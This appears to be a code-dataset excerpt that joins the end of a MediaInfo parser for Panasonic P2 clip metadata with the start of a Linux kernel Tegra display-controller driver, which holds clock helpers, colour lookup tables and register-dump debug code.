                                MXF_File+=file;
                                Ztring Pos=Ztring::ToZtring(Audio_Count);
                                if (Pos.size()<2)
                                    Pos.insert(0, 1, _T('0'));
                                MXF_File+=Pos;
                                MXF_File+=_T(".MXF");
                                File__ReferenceFilesHelper::reference ReferenceFile;
                                ReferenceFile.FileNames.push_back(MXF_File);
                                ReferenceFile.StreamKind=Stream_Audio;
                                ReferenceFile.StreamID=Ztring::ToZtring(ReferenceFiles->References.size()+1);
                                ReferenceFiles->References.push_back(ReferenceFile);
                                Audio_Count++;
                            }
                            #endif //defined(MEDIAINFO_MXF_YES)
                        }
                        Track=Track->NextSiblingElement();
                    }
                }

                //ClipMetadata: dates, device, shoot info, scenario, news
                TiXmlElement* ClipMetadata=ClipContent->FirstChildElement("ClipMetadata");
                if (ClipMetadata)
                {
                    TiXmlElement* Access=ClipMetadata->FirstChildElement("Access");
                    if (Access)
                    {
                        //CreationDate ("YYYY-MM-DDThh:mm:ss+00:00" -> "UTC YYYY-MM-DD hh:mm:ss")
                        ChildElement=Access->FirstChildElement("CreationDate");
                        if (ChildElement)
                        {
                            Ztring Content=ChildElement->GetText();
                            if (Content.size()>=11 && Content[10]==_T('T'))
                                Content[10]=_T(' ');
                            if (Content.find(_T("+00:00"))!=string::npos)
                            {
                                Content.resize(10+1+8);
                                Content.insert(0, _T("UTC "));
                            }
                            Fill(Stream_General, 0, General_Recorded_Date, Content);
                        }
                        //LastUpdateDate (comment was mislabeled "CreationDate" in the original)
                        ChildElement=Access->FirstChildElement("LastUpdateDate");
                        if (ChildElement)
                        {
                            Ztring Content=ChildElement->GetText();
                            if (Content.size()>=11 && Content[10]==_T('T'))
                                Content[10]=_T(' ');
                            if (Content.find(_T("+00:00"))!=string::npos)
                            {
                                Content.resize(10+1+8);
                                Content.insert(0, _T("UTC "));
                            }
                            Fill(Stream_General, 0, General_Tagged_Date, Content);
                        }
                    }
                    TiXmlElement* Device=ClipMetadata->FirstChildElement("Device");
                    if (Device)
                    {
                        //Manufacturer+ModelName
                        TiXmlElement* Manufacturer=Device->FirstChildElement("Manufacturer");
                        TiXmlElement* ModelName=Device->FirstChildElement("ModelName");
                        if (Manufacturer && ModelName)
                            Fill(Stream_General, 0, General_Encoded_Application, string(Manufacturer->GetText())+" "+ModelName->GetText());
                    }
                    TiXmlElement* Shoot=ClipMetadata->FirstChildElement("Shoot");
                    if (Shoot)
                    {
                        //StartDate
                        ChildElement=Shoot->FirstChildElement("StartDate");
                        if (ChildElement)
                        {
                            Ztring Content=ChildElement->GetText();
                            if (Content.size()>=11 && Content[10]==_T('T'))
                                Content[10]=_T(' ');
                            if (Content.find(_T("+00:00"))!=string::npos)
                            {
                                Content.resize(10+1+8);
                                Content.insert(0, _T("UTC "));
                            }
                            Fill(Stream_General, 0, General_Duration_Start, Content);
                        }
                        //EndDate
                        ChildElement=Shoot->FirstChildElement("EndDate");
                        if (ChildElement)
                        {
                            Ztring Content=ChildElement->GetText();
                            if (Content.size()>=11 && Content[10]==_T('T'))
                                Content[10]=_T(' ');
                            if (Content.find(_T("+00:00"))!=string::npos)
                            {
                                Content.resize(10+1+8);
                                Content.insert(0, _T("UTC "));
                            }
                            Fill(Stream_General, 0, General_Duration_End, Content);
                        }
                        //Location
                        TiXmlElement* Location=Shoot->FirstChildElement("Location");
                        if (Location)
                        {
                            //Longitude+Latitude
                            TiXmlElement* Longitude=Location->FirstChildElement("Longitude");
                            TiXmlElement* Latitude=Location->FirstChildElement("Latitude");
                            if (Longitude && Latitude)
                                Fill(Stream_General, 0, General_Recorded_Location, string(Latitude->GetText())+", "+Longitude->GetText());
                        }
                    }
                    TiXmlElement* Scenario=ClipMetadata->FirstChildElement("Scenario");
                    if (Scenario)
                    {
                        //ProgramName
                        ChildElement=Scenario->FirstChildElement("ProgramName");
                        if (ChildElement)
                            Fill(Stream_General, 0, General_Title, ChildElement->GetText());
                        //SceneNo.
                        ChildElement=Scenario->FirstChildElement("SceneNo.");
                        if (ChildElement)
                            Fill(Stream_General, 0, "Scene Number", ChildElement->GetText());
                        //TakeNo.
                        ChildElement=Scenario->FirstChildElement("TakeNo.");
                        if (ChildElement)
                            Fill(Stream_General, 0, "Take Number", ChildElement->GetText());
                    }
                    TiXmlElement* News=ClipMetadata->FirstChildElement("News");
                    if (News)
                    {
                        //Reporter
                        ChildElement=News->FirstChildElement("Reporter");
                        if (ChildElement)
                            Fill(Stream_General, 0, "Reporter", ChildElement->GetText());
                        //Purpose
                        ChildElement=News->FirstChildElement("Purpose");
                        if (ChildElement)
                            Fill(Stream_General, 0, "Purpose", ChildElement->GetText());
                        //Object
                        ChildElement=News->FirstChildElement("Object");
                        if (ChildElement)
                            Fill(Stream_General, 0, "Object", ChildElement->GetText());
                    }
                }
            }
        }
        else
        {
            Reject("P2_Clip");
            return false;
        }
    }
    else
    {
        Reject("P2_Clip");
        return false;
    }

    //All should be OK...
    return true;
}
} //NameSpace
#endif //MEDIAINFO_P2_YES
| gpl-2.0 |
thune-xiaobai/android_kernel_zte_pluto | drivers/video/tegra/dc/dc.c | 3 | 72020 | /*
* drivers/video/tegra/dc/dc.c
*
* Copyright (C) 2010 Google, Inc.
* Author: Erik Gilling <konkers@android.com>
*
* Copyright (c) 2010-2013, NVIDIA CORPORATION, All rights reserved.
*
* This software is licensed under the terms of the GNU General Public
* License version 2, as published by the Free Software Foundation, and
* may be copied, distributed, and modified under those terms.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
*/
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/err.h>
#include <linux/errno.h>
#include <linux/interrupt.h>
#include <linux/slab.h>
#include <linux/io.h>
#include <linux/clk.h>
#include <linux/mutex.h>
#include <linux/delay.h>
#include <linux/dma-mapping.h>
#include <linux/workqueue.h>
#include <linux/ktime.h>
#include <linux/debugfs.h>
#include <linux/seq_file.h>
#include <linux/backlight.h>
#include <linux/gpio.h>
#include <linux/nvhost.h>
#include <video/tegrafb.h>
#include <drm/drm_fixed.h>
#ifdef CONFIG_SWITCH
#include <linux/switch.h>
#endif
#define CREATE_TRACE_POINTS
#include <trace/events/display.h>
#include <mach/clk.h>
#include <mach/dc.h>
#include <mach/fb.h>
#include <mach/mc.h>
#include <linux/nvhost.h>
#include <mach/latency_allowance.h>
#include <mach/iomap.h>
#include "dc_reg.h"
#include "dc_config.h"
#include "dc_priv.h"
#include "dev.h"
#include "nvsd.h"
#define TEGRA_CRC_LATCHED_DELAY 34
#define DC_COM_PIN_OUTPUT_POLARITY1_INIT_VAL 0x01000000
#define DC_COM_PIN_OUTPUT_POLARITY3_INIT_VAL 0x0
/* Safe 640x480@60 (VGA, 25.2 MHz pixel clock) timing used as the HDMI
 * fallback mode. */
static struct fb_videomode tegra_dc_hdmi_fallback_mode = {
	.refresh = 60,
	.xres = 640,
	.yres = 480,
	.pixclock = KHZ2PICOS(25200),
	.hsync_len = 96,	/* h_sync_width */
	.vsync_len = 2,		/* v_sync_width */
	.left_margin = 48,	/* h_back_porch */
	.upper_margin = 33,	/* v_back_porch */
	.right_margin = 16,	/* h_front_porch */
	.lower_margin = 10,	/* v_front_porch */
	.vmode = 0,
	.sync = 0,
};
static struct tegra_dc_mode override_disp_mode[3];
static void _tegra_dc_controller_disable(struct tegra_dc *dc);
#if CONFIG_ESD_READ_TE
static struct tegra_dc *g_dc;
extern void tegra_dc_dsi_reset_lcd(struct tegra_dc *dc);
#endif
struct tegra_dc *tegra_dcs[TEGRA_MAX_DC];
DEFINE_MUTEX(tegra_dc_lock);
DEFINE_MUTEX(shared_lock);
/* Scaling-filter capability of each hardware window, indexed by window id
 * (h = horizontal filter available, v = vertical filter available). */
static const struct {
	bool h;
	bool v;
} can_filter[] = {
	/* Window A has no filtering */
	{ false, false },
	/* Window B has both H and V filtering */
	{ true, true },
	/* Window C has only V filtering (h=false, v=true) */
	{ false, true },
};
#ifdef CONFIG_TEGRA_DC_CMU
static struct tegra_dc_cmu default_cmu = {
/* lut1 maps sRGB to linear space. */
{
0, 1, 2, 4, 5, 6, 7, 9,
10, 11, 12, 14, 15, 16, 18, 20,
21, 23, 25, 27, 29, 31, 33, 35,
37, 40, 42, 45, 48, 50, 53, 56,
59, 62, 66, 69, 72, 76, 79, 83,
87, 91, 95, 99, 103, 107, 112, 116,
121, 126, 131, 136, 141, 146, 151, 156,
162, 168, 173, 179, 185, 191, 197, 204,
210, 216, 223, 230, 237, 244, 251, 258,
265, 273, 280, 288, 296, 304, 312, 320,
329, 337, 346, 354, 363, 372, 381, 390,
400, 409, 419, 428, 438, 448, 458, 469,
479, 490, 500, 511, 522, 533, 544, 555,
567, 578, 590, 602, 614, 626, 639, 651,
664, 676, 689, 702, 715, 728, 742, 755,
769, 783, 797, 811, 825, 840, 854, 869,
884, 899, 914, 929, 945, 960, 976, 992,
1008, 1024, 1041, 1057, 1074, 1091, 1108, 1125,
1142, 1159, 1177, 1195, 1213, 1231, 1249, 1267,
1286, 1304, 1323, 1342, 1361, 1381, 1400, 1420,
1440, 1459, 1480, 1500, 1520, 1541, 1562, 1582,
1603, 1625, 1646, 1668, 1689, 1711, 1733, 1755,
1778, 1800, 1823, 1846, 1869, 1892, 1916, 1939,
1963, 1987, 2011, 2035, 2059, 2084, 2109, 2133,
2159, 2184, 2209, 2235, 2260, 2286, 2312, 2339,
2365, 2392, 2419, 2446, 2473, 2500, 2527, 2555,
2583, 2611, 2639, 2668, 2696, 2725, 2754, 2783,
2812, 2841, 2871, 2901, 2931, 2961, 2991, 3022,
3052, 3083, 3114, 3146, 3177, 3209, 3240, 3272,
3304, 3337, 3369, 3402, 3435, 3468, 3501, 3535,
3568, 3602, 3636, 3670, 3705, 3739, 3774, 3809,
3844, 3879, 3915, 3950, 3986, 4022, 4059, 4095,
},
/* csc */
{
0x100, 0x0, 0x0,
0x0, 0x100, 0x0,
0x0, 0x0, 0x100,
},
/* lut2 maps linear space to sRGB*/
{
0, 1, 2, 2, 3, 4, 5, 6,
6, 7, 8, 9, 10, 10, 11, 12,
13, 13, 14, 15, 15, 16, 16, 17,
18, 18, 19, 19, 20, 20, 21, 21,
22, 22, 23, 23, 23, 24, 24, 25,
25, 25, 26, 26, 27, 27, 27, 28,
28, 29, 29, 29, 30, 30, 30, 31,
31, 31, 32, 32, 32, 33, 33, 33,
34, 34, 34, 34, 35, 35, 35, 36,
36, 36, 37, 37, 37, 37, 38, 38,
38, 38, 39, 39, 39, 40, 40, 40,
40, 41, 41, 41, 41, 42, 42, 42,
42, 43, 43, 43, 43, 43, 44, 44,
44, 44, 45, 45, 45, 45, 46, 46,
46, 46, 46, 47, 47, 47, 47, 48,
48, 48, 48, 48, 49, 49, 49, 49,
49, 50, 50, 50, 50, 50, 51, 51,
51, 51, 51, 52, 52, 52, 52, 52,
53, 53, 53, 53, 53, 54, 54, 54,
54, 54, 55, 55, 55, 55, 55, 55,
56, 56, 56, 56, 56, 57, 57, 57,
57, 57, 57, 58, 58, 58, 58, 58,
58, 59, 59, 59, 59, 59, 59, 60,
60, 60, 60, 60, 60, 61, 61, 61,
61, 61, 61, 62, 62, 62, 62, 62,
62, 63, 63, 63, 63, 63, 63, 64,
64, 64, 64, 64, 64, 64, 65, 65,
65, 65, 65, 65, 66, 66, 66, 66,
66, 66, 66, 67, 67, 67, 67, 67,
67, 67, 68, 68, 68, 68, 68, 68,
68, 69, 69, 69, 69, 69, 69, 69,
70, 70, 70, 70, 70, 70, 70, 71,
71, 71, 71, 71, 71, 71, 72, 72,
72, 72, 72, 72, 72, 72, 73, 73,
73, 73, 73, 73, 73, 74, 74, 74,
74, 74, 74, 74, 74, 75, 75, 75,
75, 75, 75, 75, 75, 76, 76, 76,
76, 76, 76, 76, 77, 77, 77, 77,
77, 77, 77, 77, 78, 78, 78, 78,
78, 78, 78, 78, 78, 79, 79, 79,
79, 79, 79, 79, 79, 80, 80, 80,
80, 80, 80, 80, 80, 81, 81, 81,
81, 81, 81, 81, 81, 81, 82, 82,
82, 82, 82, 82, 82, 82, 83, 83,
83, 83, 83, 83, 83, 83, 83, 84,
84, 84, 84, 84, 84, 84, 84, 84,
85, 85, 85, 85, 85, 85, 85, 85,
85, 86, 86, 86, 86, 86, 86, 86,
86, 86, 87, 87, 87, 87, 87, 87,
87, 87, 87, 88, 88, 88, 88, 88,
88, 88, 88, 88, 88, 89, 89, 89,
89, 89, 89, 89, 89, 89, 90, 90,
90, 90, 90, 90, 90, 90, 90, 90,
91, 91, 91, 91, 91, 91, 91, 91,
91, 91, 92, 92, 92, 92, 92, 92,
92, 92, 92, 92, 93, 93, 93, 93,
93, 93, 93, 93, 93, 93, 94, 94,
94, 94, 94, 94, 94, 94, 94, 94,
95, 95, 95, 95, 95, 95, 95, 95,
95, 95, 96, 96, 96, 96, 96, 96,
96, 96, 96, 96, 96, 97, 97, 97,
97, 97, 97, 97, 97, 97, 97, 98,
98, 98, 98, 98, 98, 98, 98, 98,
98, 98, 99, 99, 99, 99, 99, 99,
99, 100, 101, 101, 102, 103, 103, 104,
105, 105, 106, 107, 107, 108, 109, 109,
110, 111, 111, 112, 113, 113, 114, 115,
115, 116, 116, 117, 118, 118, 119, 119,
120, 120, 121, 122, 122, 123, 123, 124,
124, 125, 126, 126, 127, 127, 128, 128,
129, 129, 130, 130, 131, 131, 132, 132,
133, 133, 134, 134, 135, 135, 136, 136,
137, 137, 138, 138, 139, 139, 140, 140,
141, 141, 142, 142, 143, 143, 144, 144,
145, 145, 145, 146, 146, 147, 147, 148,
148, 149, 149, 150, 150, 150, 151, 151,
152, 152, 153, 153, 153, 154, 154, 155,
155, 156, 156, 156, 157, 157, 158, 158,
158, 159, 159, 160, 160, 160, 161, 161,
162, 162, 162, 163, 163, 164, 164, 164,
165, 165, 166, 166, 166, 167, 167, 167,
168, 168, 169, 169, 169, 170, 170, 170,
171, 171, 172, 172, 172, 173, 173, 173,
174, 174, 174, 175, 175, 176, 176, 176,
177, 177, 177, 178, 178, 178, 179, 179,
179, 180, 180, 180, 181, 181, 182, 182,
182, 183, 183, 183, 184, 184, 184, 185,
185, 185, 186, 186, 186, 187, 187, 187,
188, 188, 188, 189, 189, 189, 189, 190,
190, 190, 191, 191, 191, 192, 192, 192,
193, 193, 193, 194, 194, 194, 195, 195,
195, 196, 196, 196, 196, 197, 197, 197,
198, 198, 198, 199, 199, 199, 200, 200,
200, 200, 201, 201, 201, 202, 202, 202,
202, 203, 203, 203, 204, 204, 204, 205,
205, 205, 205, 206, 206, 206, 207, 207,
207, 207, 208, 208, 208, 209, 209, 209,
209, 210, 210, 210, 211, 211, 211, 211,
212, 212, 212, 213, 213, 213, 213, 214,
214, 214, 214, 215, 215, 215, 216, 216,
216, 216, 217, 217, 217, 217, 218, 218,
218, 219, 219, 219, 219, 220, 220, 220,
220, 221, 221, 221, 221, 222, 222, 222,
223, 223, 223, 223, 224, 224, 224, 224,
225, 225, 225, 225, 226, 226, 226, 226,
227, 227, 227, 227, 228, 228, 228, 228,
229, 229, 229, 229, 230, 230, 230, 230,
231, 231, 231, 231, 232, 232, 232, 232,
233, 233, 233, 233, 234, 234, 234, 234,
235, 235, 235, 235, 236, 236, 236, 236,
237, 237, 237, 237, 238, 238, 238, 238,
239, 239, 239, 239, 240, 240, 240, 240,
240, 241, 241, 241, 241, 242, 242, 242,
242, 243, 243, 243, 243, 244, 244, 244,
244, 244, 245, 245, 245, 245, 246, 246,
246, 246, 247, 247, 247, 247, 247, 248,
248, 248, 248, 249, 249, 249, 249, 249,
250, 250, 250, 250, 251, 251, 251, 251,
251, 252, 252, 252, 252, 253, 253, 253,
253, 253, 254, 254, 254, 254, 255, 255,
},
};
#endif
/* Turn on the DC controller clock and raise DVFS to the mode's pixel
 * clock; no-op when the clock is already running. */
void tegra_dc_clk_enable(struct tegra_dc *dc)
{
	if (tegra_is_clk_enabled(dc->clk))
		return;

	clk_prepare_enable(dc->clk);
	tegra_dvfs_set_rate(dc->clk, dc->mode.pclk);
}
/* Turn off the DC controller clock and drop its DVFS request; no-op when
 * the clock is already stopped. */
void tegra_dc_clk_disable(struct tegra_dc *dc)
{
	if (!tegra_is_clk_enabled(dc->clk))
		return;

	clk_disable_unprepare(dc->clk);
	tegra_dvfs_set_rate(dc->clk, 0);
}
/* Pin the display output path for register access: take an extra DC clock
 * reference and let the output driver hold whatever state it needs.
 * Balanced by tegra_dc_release_dc_out(). */
void tegra_dc_hold_dc_out(struct tegra_dc *dc)
{
	/* extra reference to dc clk */
	clk_prepare_enable(dc->clk);
	if (dc->out_ops->hold)
		dc->out_ops->hold(dc);
}
/* Undo tegra_dc_hold_dc_out(): release the output driver first, then drop
 * the extra DC clock reference. */
void tegra_dc_release_dc_out(struct tegra_dc *dc)
{
	if (dc->out_ops->release)
		dc->out_ops->release(dc);
	/* balance extra dc clk reference */
	clk_disable_unprepare(dc->clk);
}
/* Emit one DC register as "NAME  offset  value" through the local 'print'
 * callback; relies on 'dc', 'buff', 'print' and 'data' being in scope. */
#define DUMP_REG(a) do {			\
	snprintf(buff, sizeof(buff), "%-32s\t%03x\t%08lx\n", \
		 #a, a, tegra_dc_readl(dc, a));		      \
	print(data, buff);				      \
	} while (0)
/* Dump every display-controller register through 'print' ('data' is
 * passed through to the callback).  Holds dc->lock, the register
 * aperture and the output path for the whole read-out.
 *
 * Fix: the CMU CSC section dumped DC_COM_CMU_CSC_KBR twice and never
 * dumped DC_COM_CMU_CSC_KBG (the register clearly exists — it is written
 * in tegra_dc_set_cmu()).
 */
static void _dump_regs(struct tegra_dc *dc, void *data,
		       void (* print)(void *data, const char *str))
{
	int i;
	char buff[256];

	mutex_lock(&dc->lock);
	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);

	/* Command / interrupt / timing registers */
	DUMP_REG(DC_CMD_DISPLAY_COMMAND_OPTION0);
	DUMP_REG(DC_CMD_DISPLAY_COMMAND);
	DUMP_REG(DC_CMD_SIGNAL_RAISE);
	DUMP_REG(DC_CMD_INT_STATUS);
	DUMP_REG(DC_CMD_INT_MASK);
	DUMP_REG(DC_CMD_INT_ENABLE);
	DUMP_REG(DC_CMD_INT_TYPE);
	DUMP_REG(DC_CMD_INT_POLARITY);
	DUMP_REG(DC_CMD_SIGNAL_RAISE1);
	DUMP_REG(DC_CMD_SIGNAL_RAISE2);
	DUMP_REG(DC_CMD_SIGNAL_RAISE3);
	DUMP_REG(DC_CMD_STATE_ACCESS);
	DUMP_REG(DC_CMD_STATE_CONTROL);
	DUMP_REG(DC_CMD_DISPLAY_WINDOW_HEADER);
	DUMP_REG(DC_CMD_REG_ACT_CONTROL);
	DUMP_REG(DC_DISP_DISP_SIGNAL_OPTIONS0);
	DUMP_REG(DC_DISP_DISP_SIGNAL_OPTIONS1);
	DUMP_REG(DC_DISP_DISP_WIN_OPTIONS);
	DUMP_REG(DC_DISP_MEM_HIGH_PRIORITY);
	DUMP_REG(DC_DISP_MEM_HIGH_PRIORITY_TIMER);
	DUMP_REG(DC_DISP_DISP_TIMING_OPTIONS);
	DUMP_REG(DC_DISP_REF_TO_SYNC);
	DUMP_REG(DC_DISP_SYNC_WIDTH);
	DUMP_REG(DC_DISP_BACK_PORCH);
	DUMP_REG(DC_DISP_DISP_ACTIVE);
	DUMP_REG(DC_DISP_FRONT_PORCH);
	DUMP_REG(DC_DISP_H_PULSE0_CONTROL);
	DUMP_REG(DC_DISP_H_PULSE0_POSITION_A);
	DUMP_REG(DC_DISP_H_PULSE0_POSITION_B);
	DUMP_REG(DC_DISP_H_PULSE0_POSITION_C);
	DUMP_REG(DC_DISP_H_PULSE0_POSITION_D);
	DUMP_REG(DC_DISP_H_PULSE1_CONTROL);
	DUMP_REG(DC_DISP_H_PULSE1_POSITION_A);
	DUMP_REG(DC_DISP_H_PULSE1_POSITION_B);
	DUMP_REG(DC_DISP_H_PULSE1_POSITION_C);
	DUMP_REG(DC_DISP_H_PULSE1_POSITION_D);
	DUMP_REG(DC_DISP_H_PULSE2_CONTROL);
	DUMP_REG(DC_DISP_H_PULSE2_POSITION_A);
	DUMP_REG(DC_DISP_H_PULSE2_POSITION_B);
	DUMP_REG(DC_DISP_H_PULSE2_POSITION_C);
	DUMP_REG(DC_DISP_H_PULSE2_POSITION_D);
	DUMP_REG(DC_DISP_V_PULSE0_CONTROL);
	DUMP_REG(DC_DISP_V_PULSE0_POSITION_A);
	DUMP_REG(DC_DISP_V_PULSE0_POSITION_B);
	DUMP_REG(DC_DISP_V_PULSE0_POSITION_C);
	DUMP_REG(DC_DISP_V_PULSE1_CONTROL);
	DUMP_REG(DC_DISP_V_PULSE1_POSITION_A);
	DUMP_REG(DC_DISP_V_PULSE1_POSITION_B);
	DUMP_REG(DC_DISP_V_PULSE1_POSITION_C);
	DUMP_REG(DC_DISP_V_PULSE2_CONTROL);
	DUMP_REG(DC_DISP_V_PULSE2_POSITION_A);
	DUMP_REG(DC_DISP_V_PULSE3_CONTROL);
	DUMP_REG(DC_DISP_V_PULSE3_POSITION_A);
	DUMP_REG(DC_DISP_M0_CONTROL);
	DUMP_REG(DC_DISP_M1_CONTROL);
	DUMP_REG(DC_DISP_DI_CONTROL);
	DUMP_REG(DC_DISP_PP_CONTROL);
	DUMP_REG(DC_DISP_PP_SELECT_A);
	DUMP_REG(DC_DISP_PP_SELECT_B);
	DUMP_REG(DC_DISP_PP_SELECT_C);
	DUMP_REG(DC_DISP_PP_SELECT_D);
	DUMP_REG(DC_DISP_DISP_CLOCK_CONTROL);
	DUMP_REG(DC_DISP_DISP_INTERFACE_CONTROL);
	DUMP_REG(DC_DISP_DISP_COLOR_CONTROL);
	DUMP_REG(DC_DISP_SHIFT_CLOCK_OPTIONS);
	DUMP_REG(DC_DISP_DATA_ENABLE_OPTIONS);
	DUMP_REG(DC_DISP_SERIAL_INTERFACE_OPTIONS);
	DUMP_REG(DC_DISP_LCD_SPI_OPTIONS);
	DUMP_REG(DC_DISP_BORDER_COLOR);
	DUMP_REG(DC_DISP_COLOR_KEY0_LOWER);
	DUMP_REG(DC_DISP_COLOR_KEY0_UPPER);
	DUMP_REG(DC_DISP_COLOR_KEY1_LOWER);
	DUMP_REG(DC_DISP_COLOR_KEY1_UPPER);
	DUMP_REG(DC_DISP_CURSOR_FOREGROUND);
	DUMP_REG(DC_DISP_CURSOR_BACKGROUND);
	DUMP_REG(DC_DISP_CURSOR_START_ADDR);
	DUMP_REG(DC_DISP_CURSOR_START_ADDR_NS);
	DUMP_REG(DC_DISP_CURSOR_POSITION);
	DUMP_REG(DC_DISP_CURSOR_POSITION_NS);
	DUMP_REG(DC_DISP_INIT_SEQ_CONTROL);
	DUMP_REG(DC_DISP_SPI_INIT_SEQ_DATA_A);
	DUMP_REG(DC_DISP_SPI_INIT_SEQ_DATA_B);
	DUMP_REG(DC_DISP_SPI_INIT_SEQ_DATA_C);
	DUMP_REG(DC_DISP_SPI_INIT_SEQ_DATA_D);
	DUMP_REG(DC_DISP_DC_MCCIF_FIFOCTRL);
	DUMP_REG(DC_DISP_MCCIF_DISPLAY0A_HYST);
	DUMP_REG(DC_DISP_MCCIF_DISPLAY0B_HYST);
	DUMP_REG(DC_DISP_MCCIF_DISPLAY0C_HYST);
#if defined(CONFIG_ARCH_TEGRA_2x_SOC) || defined(CONFIG_ARCH_TEGRA_3x_SOC)
	DUMP_REG(DC_DISP_MCCIF_DISPLAY1B_HYST);
#endif
	DUMP_REG(DC_DISP_DAC_CRT_CTRL);
	DUMP_REG(DC_DISP_DISP_MISC_CONTROL);

	/* Per-window registers: select each window, then dump its set. */
	for (i = 0; i < 3; i++) {
		print(data, "\n");
		snprintf(buff, sizeof(buff), "WINDOW %c:\n", 'A' + i);
		print(data, buff);

		tegra_dc_writel(dc, WINDOW_A_SELECT << i,
				DC_CMD_DISPLAY_WINDOW_HEADER);
		DUMP_REG(DC_CMD_DISPLAY_WINDOW_HEADER);
		DUMP_REG(DC_WIN_WIN_OPTIONS);
		DUMP_REG(DC_WIN_BYTE_SWAP);
		DUMP_REG(DC_WIN_BUFFER_CONTROL);
		DUMP_REG(DC_WIN_COLOR_DEPTH);
		DUMP_REG(DC_WIN_POSITION);
		DUMP_REG(DC_WIN_SIZE);
		DUMP_REG(DC_WIN_PRESCALED_SIZE);
		DUMP_REG(DC_WIN_H_INITIAL_DDA);
		DUMP_REG(DC_WIN_V_INITIAL_DDA);
		DUMP_REG(DC_WIN_DDA_INCREMENT);
		DUMP_REG(DC_WIN_LINE_STRIDE);
#if defined(CONFIG_ARCH_TEGRA_2x_SOC) || defined(CONFIG_ARCH_TEGRA_3x_SOC)
		DUMP_REG(DC_WIN_BUF_STRIDE);
		DUMP_REG(DC_WIN_UV_BUF_STRIDE);
#endif
		DUMP_REG(DC_WIN_BLEND_NOKEY);
		DUMP_REG(DC_WIN_BLEND_1WIN);
		DUMP_REG(DC_WIN_BLEND_2WIN_X);
		DUMP_REG(DC_WIN_BLEND_2WIN_Y);
		DUMP_REG(DC_WIN_BLEND_3WIN_XY);
		DUMP_REG(DC_WINBUF_START_ADDR);
		DUMP_REG(DC_WINBUF_START_ADDR_U);
		DUMP_REG(DC_WINBUF_START_ADDR_V);
		DUMP_REG(DC_WINBUF_ADDR_H_OFFSET);
		DUMP_REG(DC_WINBUF_ADDR_V_OFFSET);
		DUMP_REG(DC_WINBUF_UFLOW_STATUS);
		DUMP_REG(DC_WIN_CSC_YOF);
		DUMP_REG(DC_WIN_CSC_KYRGB);
		DUMP_REG(DC_WIN_CSC_KUR);
		DUMP_REG(DC_WIN_CSC_KVR);
		DUMP_REG(DC_WIN_CSC_KUG);
		DUMP_REG(DC_WIN_CSC_KVG);
		DUMP_REG(DC_WIN_CSC_KUB);
		DUMP_REG(DC_WIN_CSC_KVB);
	}

	/* Output pins, PWM and smart-dimmer */
	DUMP_REG(DC_CMD_DISPLAY_POWER_CONTROL);
	DUMP_REG(DC_COM_PIN_OUTPUT_ENABLE2);
	DUMP_REG(DC_COM_PIN_OUTPUT_POLARITY2);
	DUMP_REG(DC_COM_PIN_OUTPUT_DATA2);
	DUMP_REG(DC_COM_PIN_INPUT_ENABLE2);
	DUMP_REG(DC_COM_PIN_OUTPUT_SELECT5);
	DUMP_REG(DC_DISP_DISP_SIGNAL_OPTIONS0);
	DUMP_REG(DC_DISP_M1_CONTROL);
	DUMP_REG(DC_COM_PM1_CONTROL);
	DUMP_REG(DC_COM_PM1_DUTY_CYCLE);
	DUMP_REG(DC_DISP_SD_CONTROL);
#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
	DUMP_REG(DC_COM_CMU_CSC_KRR);
	DUMP_REG(DC_COM_CMU_CSC_KGR);
	DUMP_REG(DC_COM_CMU_CSC_KBR);
	DUMP_REG(DC_COM_CMU_CSC_KRG);
	DUMP_REG(DC_COM_CMU_CSC_KGG);
	DUMP_REG(DC_COM_CMU_CSC_KBG); /* was a duplicate KBR; KBG was missing */
	DUMP_REG(DC_COM_CMU_CSC_KRB);
	DUMP_REG(DC_COM_CMU_CSC_KGB);
	DUMP_REG(DC_COM_CMU_CSC_KBB);
#endif

	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);
}
#undef DUMP_REG
#ifdef DEBUG
/* _dump_regs() 'print' callback for dump_regs(): 'data' is the tegra_dc
 * itself; each chunk goes to the device debug log. */
static void dump_regs_print(void *data, const char *str)
{
	struct tegra_dc *dc = data;
	dev_dbg(&dc->ndev->dev, "%s", str);
}
/* Dump all DC registers to the kernel log (DEBUG builds only). */
static void dump_regs(struct tegra_dc *dc)
{
	_dump_regs(dc, dc, dump_regs_print);
}
#else /* !DEBUG */
/* No-op stub when register dumping is compiled out. */
static void dump_regs(struct tegra_dc *dc) {}
#endif /* DEBUG */
#ifdef CONFIG_DEBUG_FS
/* _dump_regs() 'print' callback for the debugfs "regs" file: 'data' is
 * the seq_file being filled. */
static void dbg_regs_print(void *data, const char *str)
{
	struct seq_file *s = data;

	seq_printf(s, "%s", str);
}
#undef DUMP_REG
/* debugfs "regs" show handler: dump all DC registers into the seq_file. */
static int dbg_dc_show(struct seq_file *s, void *unused)
{
	struct tegra_dc *dc = s->private;

	_dump_regs(dc, s, dbg_regs_print);
	return 0;
}
/* debugfs "regs" open: bind the per-dc private data to the seq_file. */
static int dbg_dc_open(struct inode *inode, struct file *file)
{
	return single_open(file, dbg_dc_show, inode->i_private);
}
/* File operations for the read-only debugfs "regs" file. */
static const struct file_operations regs_fops = {
	.open		= dbg_dc_open,
	.read		= seq_read,
	.llseek		= seq_lseek,
	.release	= single_release,
};
/* debugfs "mode" show handler: print the currently-programmed display
 * timing (snapshot taken under dc->lock). */
static int dbg_dc_mode_show(struct seq_file *s, void *unused)
{
	struct tegra_dc *dc = s->private;
	struct tegra_dc_mode *m;

	mutex_lock(&dc->lock);
	m = &dc->mode;
	seq_printf(s,
		"pclk: %d\n"
		"h_ref_to_sync: %d\n"
		"v_ref_to_sync: %d\n"
		"h_sync_width: %d\n"
		"v_sync_width: %d\n"
		"h_back_porch: %d\n"
		"v_back_porch: %d\n"
		"h_active: %d\n"
		"v_active: %d\n"
		"h_front_porch: %d\n"
		"v_front_porch: %d\n"
		"stereo_mode: %d\n",
		m->pclk, m->h_ref_to_sync, m->v_ref_to_sync,
		m->h_sync_width, m->v_sync_width,
		m->h_back_porch, m->v_back_porch,
		m->h_active, m->v_active,
		m->h_front_porch, m->v_front_porch,
		m->stereo_mode);
	mutex_unlock(&dc->lock);
	return 0;
}
/* debugfs "mode" open: bind the per-dc private data to the seq_file. */
